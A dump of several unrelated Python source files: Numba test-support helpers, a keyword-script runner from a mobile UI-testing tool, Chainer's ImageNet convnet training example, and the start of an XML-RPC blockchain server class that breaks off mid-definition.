cr = compile_isolated(pyfunc, (), flags=flags)
cfunc = cr.entry_point
expected = pyfunc()
got = cfunc()
self.assertPreciseEqual(got, expected)
return got, expected
if PY2:
@contextmanager
def subTest(self, *args, **kwargs):
"""A stub TestCase.subTest backport.
This implementation is a no-op.
"""
yield
class SerialMixin(object):
"""Mixin to mark test for serial execution.
"""
_numba_parallel_test_ = False
# Various helpers
@contextlib.contextmanager
def override_config(name, value):
"""
Return a context manager that temporarily sets Numba config variable
*name* to *value*. *name* must be the name of an existing variable
in numba.config.
"""
old_value = getattr(config, name)
setattr(config, name, value)
try:
yield
finally:
setattr(config, name, old_value)
@contextlib.contextmanager
def override_env_config(name, value):
"""
Return a context manager that temporarily sets an Numba config environment
*name* to *value*.
"""
old = os.environ.get(name)
os.environ[name] = value
config.reload_config()
try:
yield
finally:
if old is None:
# If it wasn't set originally, delete the environ var
del os.environ[name]
else:
# Otherwise, restore to the old value
os.environ[name] = old
# Always reload config
config.reload_config()
def compile_function(name, code, globs):
"""
Given a *code* string, compile it with globals *globs* and return
the function named *name*.
"""
co = compile(code.rstrip(), "<string>", "single")
ns = {}
eval(co, globs, ns)
return ns[name]
def tweak_code(func, codestring=None, consts=None):
"""
Tweak the code object of the given function by replacing its
*codestring* (a bytes object) and *consts* tuple, optionally.
"""
co = func.__code__
tp = type(co)
if codestring is None:
codestring = co.co_code
if consts is None:
consts = co.co_consts
if sys.version_info >= (3, 8):
new_code = tp(co.co_argcount, co.co_posonlyargcount,
co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
elif sys.version_info >= (3,):
new_code = tp(co.co_argcount, co.co_kwonlyargcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
else:
new_code = tp(co.co_argcount, co.co_nlocals,
co.co_stacksize, co.co_flags, codestring,
consts, co.co_names, co.co_varnames,
co.co_filename, co.co_name, co.co_firstlineno,
co.co_lnotab)
func.__code__ = new_code
_trashcan_dir = 'numba-tests'
if os.name == 'nt':
# Under Windows, gettempdir() points to the user-local temp dir
_trashcan_dir = os.path.join(tempfile.gettempdir(), _trashcan_dir)
else:
# Mix the UID into the directory name to allow different users to
# run the test suite without permission errors (issue #1586)
_trashcan_dir = os.path.join(tempfile.gettempdir(),
"%s.%s" % (_trashcan_dir, os.getuid()))
# Stale temporary directories are deleted after they are older than this value.
# The test suite probably won't ever take longer than this...
_trashcan_timeout = 24 * 3600 # 1 day
def _create_trashcan_dir():
try:
os.mkdir(_trashcan_dir)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _purge_trashcan_dir():
freshness_threshold = time.time() - _trashcan_timeout
for fn in sorted(os.listdir(_trashcan_dir)):
fn = os.path.join(_trashcan_dir, fn)
try:
st = os.stat(fn)
if st.st_mtime < freshness_threshold:
shutil.rmtree(fn, ignore_errors=True)
except OSError as e:
# In parallel testing, several processes can attempt to
# remove the same entry at once, ignore.
pass
def _create_trashcan_subdir(prefix):
_purge_trashcan_dir()
path = tempfile.mkdtemp(prefix=prefix + '-', dir=_trashcan_dir)
return path
def temp_directory(prefix):
"""
Create a temporary directory with the given *prefix* that will survive
at least as long as this process invocation. The temporary directory
will be eventually deleted when it becomes stale enough.
This is necessary because a DLL file can't be deleted while in use
under Windows.
An interesting side-effect is to be able to inspect the test files
shortly after a test suite run.
"""
_create_trashcan_dir()
return _create_trashcan_subdir(prefix)
def import_dynamic(modname):
"""
Import and return a module of the given name. Care is taken to
avoid issues due to Python's internal directory caching.
"""
if sys.version_info >= (3, 3):
import importlib
importlib.invalidate_caches()
__import__(modname)
return sys.modules[modname]
# From CPython
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO."""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, utils.StringIO())
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print("hello")
self.assertEqual(stdout.getvalue(), "hello\n")
"""
return captured_output("stdout")
def captured_stderr():
"""Capture the output of sys.stderr:
with captured_stderr() as stderr:
print("hello", file=sys.stderr)
self.assertEqual(stderr.getvalue(), "hello\n")
"""
return captured_output("stderr")
@contextlib.contextmanager
def capture_cache_log():
with captured_stdout() as out:
with override_config('DEBUG_CACHE', True):
yield out
class MemoryLeak(object):
__enable_leak_check = True
def memory_leak_setup(self):
# Clean up any NRT-backed objects hanging in a dead reference cycle
gc.collect()
self.__init_stats = rtsys.get_allocation_stats()
def memory_leak_teardown(self):
if self.__enable_leak_check:
self.assert_no_memory_leak()
def assert_no_memory_leak(self):
old = self.__init_stats
new = rtsys.get_allocation_stats()
total_alloc = new.alloc - old.alloc
total_free = new.free - old.free
total_mi_alloc = new.mi_alloc - old.mi_alloc
total_mi_free = new.mi_free - old.mi_free
self.assertEqual(total_alloc, total_free)
self.assertEqual(total_mi_alloc, total_mi_free)
def disable_leak_check(self):
# For per-test use when MemoryLeakMixin is injected into a TestCase
self.__enable_leak_check = False
class MemoryLeakMixin(MemoryLeak):
def setUp(self):
super(MemoryLeakMixin, self).setUp()
self.memory_leak_setup()
def tearDown(self):
super(MemoryLeakMixin, self).tearDown()
gc.collect()
self.memory_leak_teardown()
@contextlib.contextmanager
def forbid_codegen():
"""
Forbid LLVM code generation during the execution of the context
manager's enclosed block.
If code generation is invoked, a RuntimeError is raised.
"""
from numba.targets import codegen
patchpoints = ['CodeLibrary._finalize_final_module']
old = {}
def fail(*args, **kwargs):
raise RuntimeError("codegen forbidden by test case")
try:
# XXX use the mock library instead?
for name in patchpoints:
parts = name.split('.')
obj = codegen
for attrname in parts[:-1]:
obj = getattr(obj, attrname)
attrname = parts[-1]
value = getattr(obj, attrname)
assert callable(value), ("%r should be callable" % name)
old[obj, attrname] = value
setattr(obj, attrname, fail)
yield
finally:
for (obj, attrname), value in old.items():
setattr(obj, attrname, value)
# For details about redirection of file-descriptor, read
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/
@contextlib.contextmanager
def redirect_fd(fd):
"""
Temporarily redirect *fd* to a pipe's write end and return a file object
wrapping the pipe's read end.
"""
from numba import _helperlib
libnumba = ctypes.CDLL(_helperlib.__file__)
libnumba._numba_flush_stdout()
save = os.dup(fd)
r, w = os.pipe()
try:
os.dup2(w, fd)
yield io.open(r, "r")
finally:
libnumba._numba_flush_stdout()
os.close(w)
os.dup2(save, fd)
os.close(save)
def redirect_c_stdout():
"""Redirect C stdout
"""
fd = sys.__stdout__.fileno()
return redirect_fd(fd)
def run_in_new_process_caching(func, cache_dir_prefix=__name__, verbose=True):
"""Spawn a new process to run `func` with a temporary cache directory.
The childprocess's stdout and stderr will be captured and redirected to
the current process's stdout and stderr.
Returns
-------
ret : dict
exitcode: 0 for success. 1 for exception-raised.
stdout: str
stderr: str
"""
ctx = mp.get_context('spawn')
qout = ctx.Queue()
cache_dir = temp_directory(cache_dir_prefix)
with override_env_config('NUMBA_CACHE_DIR', cache_dir):
proc = ctx.Process(target=_remote_runner, args=[func, qout])
proc.start()
proc.join()
stdout = qout.get_nowait()
stderr = qout.get_nowait()
if verbose and stdout.strip():
print()
print('STDOUT'.center(80, '-'))
print(stdout)
if verbose and stderr.strip():
print(file=sys.stderr)
print('STDERR'.center(80, '-'), file=sys.stderr)
print(stderr, file=sys.stderr)
return {
'exitcode': proc.exitcode,
'stdout': stdout,
'stderr': stderr,
}
def _remote_runner(fn, qout):
"""Used by `run_in_new_process_caching()`
"""
with captured_stderr() as stderr:
with captured_stdout() as stdout:
try:
fn()
except Exception:
traceback.print_exc()
exitcode = 1
else:
exitcode = 0
qout.put(stdout.getvalue())
qout.put(stderr.getvalue())
sys.exit(exitcode)
|
kw_runner.py
|
import threading
import time
import datetime
import sys
from os.path import dirname, abspath, pardir, join
import logging
from uitester.test_manager import utils
from uitester.test_manager import device_proxy
from uitester.test_manager import reflection_proxy
from uitester.test_manager import local_proxy
from uitester.test_manager import context
from uitester.test_manager import adb
from uitester.test_manager import path_helper
from uitester.task_redord_manager import task_record_manager
import traceback
_MAX_LENGTH = 80
logger = logging.getLogger('Tester')
script_dir = dirname(abspath(__file__))
libs_dir = join(join(join(script_dir, pardir), pardir), 'libs')
sys.path.append(libs_dir)
class StatusMsg:
TEST_START = 1
TEST_END = 2
CASE_START = 101
CASE_END = 102
KW_LINE_START = 201
KW_LINE_END = 202
ERROR = 500
INSTALL_START = 601
INSTALL_FINISH = 602
INSTALL_FAIL = 603
AGENT_START = 701
AGENT_STOP = 702
AGENT_ERROR = 703
__status_str__ = {
TEST_START: 'TEST START',
TEST_END: 'TEST END',
CASE_START: 'CASE START',
CASE_END: 'CASE END',
KW_LINE_START: 'KW LINE START',
KW_LINE_END: 'KW LINE END',
ERROR: 'ERROR',
INSTALL_START: 'INSTALL START',
INSTALL_FINISH: 'INSTALL FINISH',
INSTALL_FAIL: 'INSTALL FAIL',
AGENT_START: 'AGENT START',
AGENT_STOP: 'AGENT STOP',
AGENT_ERROR: 'AGENT ERROR'
}
def __init__(self, status, device_id=None, case_id=0, line_number=0, message=None):
self.device_id = device_id
self.status = status
self.case_id = case_id
self.line_number = line_number
self.message = message
def __str__(self):
message = self.message if self.message else ''
return '{} case_id={} line_number={} message:\n {}'\
.format(self.__status_str__[self.status], self.case_id, self.line_number, message)
class KWRunningStatusListener:
"""
TestCase running status listener
"""
def update(self, msg):
"""
When test runner status changed. Runner will call function update
:param msg :StatusMsg
:return:
"""
pass
class RunSignal:
stop = False
class DataRow:
@classmethod
def from_row(cls, headers, data_row):
data_dict = {}
for index, header in enumerate(headers):
data_dict[header] = data_row[index]
data = cls()
data.__dict__ = data_dict
return data
@classmethod
def from_list(cls, headers, data_rows):
rows = []
for row in data_rows:
rows.append(cls.from_row(headers, row))
return rows
class KWRunner:
def __init__(self, status_listener=None, device_manager=None):
self.listener = status_listener
self.run_signal = RunSignal()
self.dm = device_manager
def execute(self, cases, devices):
self.run_signal.stop = False
self.dm.selected_devices[0].agent = None
for device in devices:
t = threading.Thread(target=self._run_cases_on_device, args=(cases, device))
t.start()
def _run_cases_on_device(self, cases, device):
self.listener.update(StatusMsg(StatusMsg.INSTALL_START, device_id=device.id))
try:
self.dm.install_agent(device)
except Exception:
self.listener.update(
StatusMsg(
StatusMsg.INSTALL_FAIL,
device_id=device.id,
message=traceback.format_exc()
))
return
self.listener.update(StatusMsg(StatusMsg.INSTALL_FINISH, device_id=device.id))
self.listener.update(StatusMsg(
StatusMsg.TEST_START,
device_id=device.id
))
recorder = task_record_manager.get_task_recorder()
for _case in cases:
core = KWCore()
core.case_id = _case.id
try:
self.dm.start_agent(device)
self.listener.update(StatusMsg(
StatusMsg.AGENT_START,
device_id=device.id
))
context.agent = device.agent
if len(_case.data) >= 2:
data_rows = DataRow.from_list(_case.data[0], _case.data[1:])
for data_row in data_rows:
core.reset()
core.set_data(data_row)
core.parse(_case.content)
core.execute(context.agent, self.listener, recorder=recorder)
else:
core.parse(_case.content)
core.execute(context.agent, self.listener, recorder=recorder)
except Exception:
trace = traceback.format_exc()
if self.listener:
self.listener.update(StatusMsg(
StatusMsg.ERROR,
device_id=device.id,
case_id=_case.id,
line_number=core.line_count,
message=trace
))
logger.debug('KWRunner: Run case failed. Catch exception\n'+trace)
self.dm.stop_agent(device)
self.listener.update(StatusMsg(
StatusMsg.TEST_END,
device_id=device.id
))
def stop(self):
self.run_signal.stop = True
class KWDebugRunner:
def __init__(self, device_manager, data=None, status_listener=None):
self.dm = device_manager
self.listener = status_listener
self.run_signal = RunSignal()
self.core = KWCore(self.run_signal)
self._data = data
@property
def data(self):
return self._data
@data.setter
def data(self, data):
if data is None:
return
if len(data) < 2:
raise ValueError('DebugRunner: Empty data list')
self._data = DataRow.from_list(data[0], data[1:])
def reset(self):
self.core.reset()
self._data = None
self.run_signal.stop = False
def parse(self, script_str):
self.core.parse(script_str)
def execute(self, script_str=None, data_line=0):
self.dm.selected_devices[0].agent = None
t = threading.Thread(target=self._thread_execute, args=(script_str, data_line))
t.start()
def _thread_execute(self, script_str=None, data_line=0):
device = self.dm.selected_devices[0]
# Install agent
self.listener.update(StatusMsg(
StatusMsg.INSTALL_START,
device_id=device.id
))
try:
self.dm.install_agent(device)
except Exception:
self.listener.update(StatusMsg(
StatusMsg.INSTALL_FAIL,
device_id=device.id,
message=traceback.format_exc()
))
return
self.listener.update(StatusMsg(
StatusMsg.INSTALL_FINISH,
device_id=device.id
))
# Start agent
try:
self.dm.start_agent(device)
except Exception:
self.listener.update(StatusMsg(
StatusMsg.AGENT_ERROR,
device_id=device.id,
message=traceback.format_exc()
))
return
self.listener.update(StatusMsg(
StatusMsg.AGENT_START,
device_id=device.id
))
try:
if data_line == 0:
if self.data is None or len(self.data) < 2:
self._execute(script_str=script_str)
else:
for data_row in self.data:
self._execute(script_str=script_str, data_row=data_row)
else:
# data_line_number = data_line-1
# run single data line
self._execute(script_str=script_str, data_row=self.data[data_line-1])
except Exception as e:
if self.listener:
self.listener.update(StatusMsg(
StatusMsg.ERROR,
device_id=context.agent.device_id,
line_number=self.core.line_count,
message=e
))
self.dm.selected_devices[0].agent.close()
def _execute(self, script_str=None, data_row=None):
self.run_signal.stop = False
if script_str:
self.core.reset()
self.core.set_data(data_row)
self.core.parse(script_str)
agent = self.dm.selected_devices[0].agent
self.core.execute(agent, self.listener)
def stop(self):
self.run_signal.stop = True
def get_var(self, var_name):
if var_name == '':
return self.core.kw_var.keys()
res = []
for v_name in self.core.kw_var:
if var_name in v_name:
res.append(v_name)
return res
def get_func(self, func_name):
if func_name == '':
return self.core.kw_func
res = {}
for f_name in self.core.kw_func:
if func_name in f_name:
res[f_name] = self.core.kw_func[f_name]
return res
def get_property(self, var_name, property_name):
var = self.core.kw_var.get(var_name)
if not var:
return ['id', 'class', 'text']
return filter(lambda x: False if x.startswith('__') or property_name not in x else True, var.__dict__.keys())
class KWCore:
AS = 'as'
QUOTE = '"'
SPACE = ' '
COMMENT = '#'
DOT = '.'
VAR = '$'
DATA = 'data'
def __init__(self, run_signal=None):
self.default_func = {
'import': self._import,
'check': self._check,
'assert_true': self.assert_true,
'assert_false': self.assert_false,
'assert_equal': self.assert_equal,
'assert_not_equal': self.assert_not_equal,
'assert_less': self.assert_less,
'assert_less_equal': self.assert_less_equal,
'assert_greater': self.assert_greater,
'assert_greater_equal': self.assert_greater_equal,
'assert_is_none': self.assert_is_none,
'assert_is_not_none': self.assert_is_not_none
}
self.kw_func = {**self.default_func}
self.kw_var = {}
self.kw_lines = []
self.status_listener = None
self.line_count = 0
self.case_id = 0
self.run_signal = run_signal
self._have_record_res = False
def reset(self):
"""
reset core. clear all func\var\listener\line count.
"""
self.kw_func = {**self.default_func}
self.kw_var = {}
self.kw_lines = []
self.status_listener = None
self.line_count = 0
self.case_id = 0
if self.run_signal:
self.run_signal.stop = False
self._have_record_res = False
def set_data(self, data_row):
self.kw_var[self.DATA] = data_row
def parse(self, script_str):
"""
parse keywords script
It will raise exceptions while parse fail
"""
lines = script_str.split('\n')
for line in lines:
self.parse_line(line.strip())
def parse_line(self, line):
"""
parse single keywords script line
"""
# set line number
self.line_count += 1
if len(line) == 0:
return
# parse line to kw line
kw_line = self._parse_line(line, line_number=self.line_count)
if kw_line.is_comment:
return
func = kw_line.items[0]
# pre import lib
if func == 'import':
self.default_func['import'](*kw_line.items[1:])
if func not in self.kw_func and func not in self.kw_var:
raise ValueError('Define not found {}'.format(func), kw_line.line_number)
# set var
if kw_line.var:
self.kw_var[kw_line.var] = None
# add kw line to cache
self.kw_lines.append(kw_line)
def execute(self, agent, listener, thread=False, recorder=None):
if thread:
threading.Thread(target=self._execute, args=(agent, listener, recorder)).start()
else:
self._execute(agent, listener, recorder)
# stop app
if 'finish_app' in self.kw_func:
self.kw_func['finish_app']()
def _execute(self, agent, listener, recorder):
start_time = datetime.datetime.now()
self.status_listener = listener
context.agent = agent
# run all kw line in cache
if self.status_listener:
# -- Case start --
self.status_listener.update(StatusMsg(
StatusMsg.CASE_START,
device_id=agent.device_id,
case_id=self.case_id
))
for line in self.kw_lines:
if self.status_listener:
# -- Line start --
self.status_listener.update(StatusMsg(
StatusMsg.KW_LINE_START,
device_id=agent.device_id,
line_number=line.line_number,
case_id=self.case_id
))
try:
if self.run_signal and self.run_signal.stop:
logger.debug('KWCore._execute : User stop test')
break
self._execute_line(line)
except Exception as e:
if self.status_listener:
# -- Error --
self.status_listener.update(StatusMsg(
StatusMsg.ERROR,
device_id=agent.device_id,
line_number=line.line_number,
case_id=self.case_id,
message=e
))
# if case line execute failed. stop this case and run next one
if self.status_listener:
# -- Line end --
self.status_listener.update(StatusMsg(
StatusMsg.KW_LINE_END,
device_id=agent.device_id,
line_number=line.line_number,
case_id=self.case_id
))
if recorder:
trace = traceback.format_exc()
recorder.add_record(self.case_id, agent.device_id, start_time, -1, trace)
self._have_record_res = True
break
if self.status_listener:
# -- Line end --
self.status_listener.update(StatusMsg(
StatusMsg.KW_LINE_END,
device_id=agent.device_id,
line_number=line.line_number,
case_id=self.case_id
))
if self.status_listener:
# -- Case end --
self.status_listener.update(StatusMsg(
StatusMsg.CASE_END,
device_id=agent.device_id,
case_id=self.case_id
))
if recorder and not self._have_record_res:
recorder.add_record(self.case_id, agent.device_id, start_time, 0, '')
def _import(self, module_name):
"""
Import python lib from .libs dir
After import, you can use functions in py lib by write function name.
------------
e.g.:
import example
test_str
------------
line 1. Import python lib witch named custom_lib in libs dir.
line 2. call function test_str() in custom_lib.
"""
# load keywords
kw = __import__('keywords')
# set real rpc proxy
kw.var_cache['proxy'] = device_proxy
kw.var_cache['reflection'] = reflection_proxy
kw.var_cache['local'] = local_proxy
# load script
__import__(module_name)
# register all kw func from keywords.kw_func
self.kw_func.update(kw.kw_func)
def _check(self, expected, actual):
"""
Assert if arg1 equals arg2
e.g. :
check some_view.text some_text
if this view's text is not some_text, then this case will be record as failed
"""
assert expected == actual, 'Assert fail. expected={} but actual={}'.format(expected, actual)
def assert_false(self, expr):
"""Check that the expression is false."""
if expr:
raise AssertionError('%s is not false' % str(expr))
def assert_true(self, expr, msg=None):
"""Check that the expression is true."""
if not expr:
raise AssertionError('%s is not true' % str(expr))
def assert_equal(self, first, second):
"""Fail if the two objects are unequal as determined by the '=='
operator.
"""
if first != second:
raise AssertionError('%s and %s not equal' % (str(first), str(second)))
def assert_not_equal(self, first, second):
"""Fail if the two objects are equal as determined by the '!='
operator.
"""
if not first != second:
raise AssertionError('%s and %s is equal' % (str(first), str(second)))
def assert_less(self, a, b):
"""Just like self.assertTrue(a < b), but with a nicer default message."""
if not a < b:
raise AssertionError('%s not less than %s' % (str(a), str(b)))
def assert_less_equal(self, a, b):
"""Just like self.assertTrue(a <= b), but with a nicer default message."""
if not a <= b:
raise AssertionError('%s not less than or equal to %s' % (str(a), str(b)))
def assert_greater(self, a, b):
"""Just like self.assertTrue(a > b), but with a nicer default message."""
if not a > b:
raise AssertionError('%s not greater than %s' % (str(a), str(b)))
def assert_greater_equal(self, a, b):
"""Just like self.assertTrue(a >= b), but with a nicer default message."""
if not a >= b:
raise AssertionError('%s not greater than or equal to %s' % (str(a), str(b)))
def assert_is_none(self, obj):
"""Same as self.assertTrue(obj is None), with a nicer default message."""
if obj is not None:
raise AssertionError('%s is not None' % (str(obj),))
def assert_is_not_none(self, obj):
"""Included for symmetry with assertIsNone."""
if obj is None:
raise AssertionError('unexpectedly None')
def _execute_line(self, kw_line):
if kw_line.is_comment:
# comment line
return
elif kw_line.items[0] == 'import':
# import has been executed while parse line
return
logger.debug('exec items {}'.format(kw_line.items))
# make args, change var name to var object
args = []
for item in kw_line.items[1:]:
if type(item) is int:
args.append(item)
elif type(item) is str and item.startswith(self.VAR):
arg_str = item[1:]
index = arg_str.find(self.DOT)
if index == -1:
args.append(self.kw_var[arg_str])
else:
var = self.kw_var[arg_str[:index]]
args.append(getattr(var, arg_str[index+1:]))
else:
args.append(item)
# execute keyword function
res = self.kw_func[kw_line.items[0]](*args)
# set response as var
if kw_line.var:
self.kw_var[kw_line.var] = res
def _parse_line(self, kw_line, line_number=0):
line = KWLine(raw=kw_line, line_number=line_number)
if kw_line.strip().startswith(self.COMMENT):
line.is_comment = True
return line
kw_items = []
cache = ''
in_quotation = False
var = None
for char in kw_line:
if char == self.SPACE and not in_quotation and cache:
kw_items.append(cache.strip())
cache = ''
elif char == self.QUOTE:
in_quotation = not in_quotation
cache += char
else:
if not cache:
cache = char
else:
cache += char
if len(cache) > 0:
kw_items.append(cache.strip())
if in_quotation:
raise ValueError('Missing quote. {}'.format(kw_line), line_number)
if self.AS in kw_items:
as_index = kw_items.index(self.AS)
if as_index < (len(kw_items) - 2):
raise ValueError('Keywords "as" should only set one variable', line_number)
elif as_index == (len(kw_items) - 1):
raise ValueError('Keywords "as" need one variable after it', line_number)
else:
var = kw_items[as_index + 1]
if var.find(self.QUOTE) != -1:
raise ValueError('Keywords "as" parse error. var name should not have any " in it.')
kw_items = kw_items[:as_index]
for index, item in enumerate(kw_items):
if item.startswith(self.VAR) and len(item) > 1 and item[1:] not in self.kw_var:
if '.' in item:
split_item = item[1:].split('.')
if split_item[0] not in self.kw_var:
raise ValueError('Var {} not defined'.format(item[1:]))
else:
if item[1:] not in self.kw_var:
raise ValueError('Var {} not defined'.format(item[1:]))
elif item.find('"') == -1:
# if kw item is int
try:
kw_items[index] = int(item)
except ValueError:
pass
else:
item = item.replace('"', '')
kw_items[index] = item
line.items = kw_items
line.var = var
return line
class KWLine:
def __init__(self, raw=None, line_number=0):
self.is_comment = False
self.items = []
self.raw = raw
self.line_number = line_number
self.var = None
|
train_imagenet.py
|
#!/usr/bin/env python
"""Example code of learning a large scale convnet from ILSVRC2012 dataset.
Prerequisite: To run this example, crop the center of ILSVRC2012 training and
validation images and scale them to 256x256, and make two lists of space-
separated CSV whose first column is full path to image and second column is
zero-origin label (this format is same as that used by Caffe's ImageDataLayer).
"""
from __future__ import print_function
import argparse
import datetime
import json
import multiprocessing
import random
import sys
import threading
import time
import numpy as np
from PIL import Image
import six
import six.moves.cPickle as pickle
from six.moves import queue
from chainer import computational_graph as c
from chainer import cuda
from chainer import optimizers
parser = argparse.ArgumentParser(
description='Learning convnet from ILSVRC2012 dataset')
parser.add_argument('train', help='Path to training image-label list file')
parser.add_argument('val', help='Path to validation image-label list file')
parser.add_argument('--mean', '-m', default='mean.npy',
help='Path to the mean file (computed by compute_mean.py)')
parser.add_argument('--arch', '-a', default='nin',
help='Convnet architecture \
(nin, alexbn, googlenet, googlenetbn)')
parser.add_argument('--batchsize', '-B', type=int, default=32,
help='Learning minibatch size')
parser.add_argument('--val_batchsize', '-b', type=int, default=250,
help='Validation minibatch size')
parser.add_argument('--epoch', '-E', default=10, type=int,
help='Number of epochs to learn')
parser.add_argument('--gpu', '-g', default=-1, type=int,
help='GPU ID (negative value indicates CPU)')
parser.add_argument('--loaderjob', '-j', default=20, type=int,
help='Number of parallel data loading processes')
parser.add_argument('--out', '-o', default='model',
help='Path to save model on each validation')
args = parser.parse_args()
if args.gpu >= 0:
cuda.check_cuda_available()
xp = cuda.cupy if args.gpu >= 0 else np
assert 50000 % args.val_batchsize == 0
def load_image_list(path):
tuples = []
for line in open(path):
pair = line.strip().split()
tuples.append((pair[0], np.int32(pair[1])))
return tuples
# Prepare dataset
train_list = load_image_list(args.train)
val_list = load_image_list(args.val)
mean_image = pickle.load(open(args.mean, 'rb'))
# Prepare model
if args.arch == 'nin':
import nin
model = nin.NIN()
elif args.arch == 'alexbn':
import alexbn
model = alexbn.AlexBN()
elif args.arch == 'googlenet':
import googlenet
model = googlenet.GoogLeNet()
elif args.arch == 'googlenetbn':
import googlenetbn
model = googlenetbn.GoogLeNetBN()
else:
raise ValueError('Invalid architecture name')
if args.gpu >= 0:
cuda.get_device(args.gpu).use()
model.to_gpu()
# Setup optimizer
optimizer = optimizers.MomentumSGD(lr=0.01, momentum=0.9)
optimizer.setup(model)
# ------------------------------------------------------------------------------
# This example consists of three threads: data feeder, logger and trainer.
# These communicate with each other via Queue.
data_q = queue.Queue(maxsize=1)
res_q = queue.Queue()
cropwidth = 256 - model.insize
def read_image(path, center=False, flip=False):
# Data loading routine
image = np.asarray(Image.open(path)).transpose(2, 0, 1)
if center:
top = left = cropwidth / 2
else:
top = random.randint(0, cropwidth - 1)
left = random.randint(0, cropwidth - 1)
bottom = model.insize + top
right = model.insize + left
image = image[:, top:bottom, left:right].astype(np.float32)
image -= mean_image[:, top:bottom, left:right]
image /= 255
if flip and random.randint(0, 1) == 0:
return image[:, :, ::-1]
else:
return image
def feed_data():
# Data feeder
i = 0
count = 0
x_batch = np.ndarray(
(args.batchsize, 3, model.insize, model.insize), dtype=np.float32)
y_batch = np.ndarray((args.batchsize,), dtype=np.int32)
val_x_batch = np.ndarray(
(args.val_batchsize, 3, model.insize, model.insize), dtype=np.float32)
val_y_batch = np.ndarray((args.val_batchsize,), dtype=np.int32)
batch_pool = [None] * args.batchsize
val_batch_pool = [None] * args.val_batchsize
pool = multiprocessing.Pool(args.loaderjob)
data_q.put('train')
for epoch in six.moves.range(1, 1 + args.epoch):
print('epoch', epoch, file=sys.stderr)
print('learning rate', optimizer.lr, file=sys.stderr)
perm = np.random.permutation(len(train_list))
for idx in perm:
path, label = train_list[idx]
batch_pool[i] = pool.apply_async(read_image, (path, False, True))
y_batch[i] = label
i += 1
if i == args.batchsize:
for j, x in enumerate(batch_pool):
x_batch[j] = x.get()
data_q.put((x_batch.copy(), y_batch.copy()))
i = 0
count += 1
if count % 100000 == 0:
data_q.put('val')
j = 0
for path, label in val_list:
val_batch_pool[j] = pool.apply_async(
read_image, (path, True, False))
val_y_batch[j] = label
j += 1
if j == args.val_batchsize:
for k, x in enumerate(val_batch_pool):
val_x_batch[k] = x.get()
data_q.put((val_x_batch.copy(), val_y_batch.copy()))
j = 0
data_q.put('train')
optimizer.lr *= 0.97
pool.close()
pool.join()
data_q.put('end')
def log_result():
# Logger
train_count = 0
train_cur_loss = 0
train_cur_accuracy = 0
begin_at = time.time()
val_begin_at = None
while True:
result = res_q.get()
if result == 'end':
print(file=sys.stderr)
break
elif result == 'train':
print(file=sys.stderr)
train = True
if val_begin_at is not None:
begin_at += time.time() - val_begin_at
val_begin_at = None
continue
elif result == 'val':
print(file=sys.stderr)
train = False
val_count = val_loss = val_accuracy = 0
val_begin_at = time.time()
continue
loss, accuracy = result
if train:
train_count += 1
duration = time.time() - begin_at
throughput = train_count * args.batchsize / duration
sys.stderr.write(
'\rtrain {} updates ({} samples) time: {} ({} images/sec)'
.format(train_count, train_count * args.batchsize,
datetime.timedelta(seconds=duration), throughput))
train_cur_loss += loss
train_cur_accuracy += accuracy
if train_count % 1000 == 0:
mean_loss = train_cur_loss / 1000
mean_error = 1 - train_cur_accuracy / 1000
print(file=sys.stderr)
print(json.dumps({'type': 'train', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
train_cur_loss = 0
train_cur_accuracy = 0
else:
val_count += args.val_batchsize
duration = time.time() - val_begin_at
throughput = val_count / duration
sys.stderr.write(
'\rval {} batches ({} samples) time: {} ({} images/sec)'
.format(val_count / args.val_batchsize, val_count,
datetime.timedelta(seconds=duration), throughput))
val_loss += loss
val_accuracy += accuracy
if val_count == 50000:
mean_loss = val_loss * args.val_batchsize / 50000
mean_error = 1 - val_accuracy * args.val_batchsize / 50000
print(file=sys.stderr)
print(json.dumps({'type': 'val', 'iteration': train_count,
'error': mean_error, 'loss': mean_loss}))
sys.stdout.flush()
def train_loop():
# Trainer
graph_generated = False
while True:
while data_q.empty():
time.sleep(0.1)
inp = data_q.get()
if inp == 'end': # quit
res_q.put('end')
break
elif inp == 'train': # restart training
res_q.put('train')
train = True
continue
elif inp == 'val': # start validation
res_q.put('val')
pickle.dump(model, open(args.out, 'wb'), -1)
train = False
continue
x = xp.asarray(inp[0])
y = xp.asarray(inp[1])
if train:
optimizer.zero_grads()
loss, accuracy = model.forward(x, y)
loss.backward()
optimizer.update()
if not graph_generated:
with open('graph.dot', 'w') as o:
o.write(c.build_computational_graph((loss,), False).dump())
with open('graph.wo_split.dot', 'w') as o:
o.write(c.build_computational_graph((loss,), True).dump())
print('generated graph')
graph_generated = True
else:
loss, accuracy = model.forward(x, y, train=False)
res_q.put((float(loss.data),
float(accuracy.data)))
del loss, accuracy, x, y
# Invoke threads
feeder = threading.Thread(target=feed_data)
feeder.daemon = True
feeder.start()
logger = threading.Thread(target=log_result)
logger.daemon = True
logger.start()
train_loop()
feeder.join()
logger.join()
# Save final model
pickle.dump(model, open(args.out, 'wb'), -1)
|
homologator.py
|
from block import Block, Transaction
from blockchain import Blockchain
import xmlrpc.server
import xmlrpc.client
import logging
import threading
from random import randint
from api import *
import sys
class Homologator(xmlrpc.server.SimpleXMLRPCServer):
def __init__(self, addr):
super().__init__(addr, logRequests=False, allow_none=True)
self.addr = addr
self.shutdown_condition = threading.Condition()
self.shutdown_event = threading.Event()
self._register_functions()
self._create_logger()
def start(self):
self.server_thread = threading.Thread(target=self.serve_forever)
self.server_thread.start()
def serve_forever(self):
base_thread = threading.Thread(target=super().serve_forever)
base_thread.start()
with self.shutdown_condition:
self.shutdown_condition.wait_for(self.shutdown_event.is_set)
self.shutdown()
def shutdown(self):
self.logger.info('Shutting down')
super().shutdown()
self.logger.info('Shutdown successfull')
def _register_functions(self):
self.register_introspection_functions()
